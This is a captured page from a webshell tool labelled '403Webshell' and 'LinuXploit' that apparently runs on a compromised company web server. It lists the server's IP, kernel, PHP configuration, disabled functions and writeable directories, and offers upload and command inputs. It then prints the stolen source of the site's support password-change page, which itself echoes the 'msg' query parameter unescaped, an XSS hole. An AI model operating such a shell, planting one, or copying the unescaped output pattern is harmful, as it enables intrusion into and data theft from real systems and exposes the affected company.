403Webshell
Server IP : 210.245.233.93  /  Your IP : 216.73.216.226
Web Server : Apache/2.2.15 (CentOS)
System : Linux webserver2.onesolution.com.hk 2.6.32-754.35.1.el6.x86_64 #1 SMP Sat Nov 7 12:42:14 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 5.3.3
Disable Function : exec, shell_exec, system, passthru, popen, proc_open, pcntl_exec
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/onesolution.com.hk/support/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/onesolution.com.hk/support/main.php
<?php require("checkuser.php"); ?>
<html>
<head>
<link rel="stylesheet" href="main.css" type="text/css">
<meta http-equiv="Content-Type" content="text/html; charset=big5" />
<script language="JavaScript" type="text/javascript" src="richtext.js"></script>
<title>One Solution Limited - Support</title>
<script language="JavaScript">
<!--
var emailfilter=/^\w+[\+\.\w-]*@([\w-]+\.)*\w+[\w-]*\.([a-z]{2,4}|\d+)$/i
function formCheck(formobj){
	return submitForm();
}
// -->
</script>
</head>
<body>
<p class='content'>Welcome: <?=$_SESSION['username']?></p>
<!--
<table border="0" cellpadding="1" cellspacing="1" width="100%">
<tr><td class='pageheader' align="left" valign="middle" height="100"><img src="images/iconUser.png">&nbsp;<b>Change password</b></td>
	<td class='content' align="center" width="150"></td>
</tr>
</table>
-->
<script language="JavaScript">
<!--
var emailfilter=/^\w+[\+\.\w-]*@([\w-]+\.)*\w+[\w-]*\.([a-z]{2,4}|\d+)$/i
function formCheck(formobj){
	// Enter name of mandatory fields
	var fieldRequired = Array("password", "repassword");
	// Enter field description to appear in the dialog box
	var fieldDescription = Array("Password", "Re-type Password");
	// dialog message
	var alertMsg = "Please complete the following fields:\n";
	
	var l_Msg = alertMsg.length;

	var password = formobj.password.value
	var repassword = formobj.repassword.value

	if (password.length < 6)
	{
		alertMsg += " - Please select a password of at least 6 characters.\n";
	}
	if (password != repassword)
	{
		alertMsg += " - Please enter a valid password.\n";
	}

	
	if (alertMsg.length == l_Msg){
		return submitForm();
	}else{
		alert(alertMsg);
		return false;
	}
}
// -->
</script>
<form action="userpassword.php" method="post" name="userposting" onsubmit="return formCheck(this);">
<input type="hidden" name="userid" value="<?=$_SESSION['userid']?>">
	<table valign='top' border='0' cellpadding='1' cellspacing='1' bgcolor='#ffffff' width="500">
		<tr><td class='content' bgcolor='#FFFFFF' align='center' valign='center'>
			<table border="0" cellpadding="0" cellspacing="1" width="500" bgcolor='#ffffff'>
					<tr><td class='content' bgcolor="#ffffff" align="right" height="25"><font color="#ff0000">*</font>&nbsp;<b>Password</b>:&nbsp;</td>
					<td class='content' bgcolor="#ffffff" style="padding-left:5"><input type="password" class='content' name="password" size="50" maxlength="50"></td></tr>
				<tr><td class='content' bgcolor="#ffffff" align="right" height="25"><font color="#ff0000">*</font>&nbsp;<b>Re-type Password</b>:&nbsp;</td>
					<td class='content' bgcolor="#ffffff" style="padding-left:5"><input type="password" class='content' name="repassword" size="50" maxlength="50"></td></tr>
			</table>
		</td></tr>
	</table>
	<input type="submit" value="Submit" class='content'>
	<table border="0" cellpadding="0" cellspacing="1" width="500">
		<tr><td colspan="2"><p class='content'><?=$_GET['msg']?></p></td></tr>
	</table>
</form>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit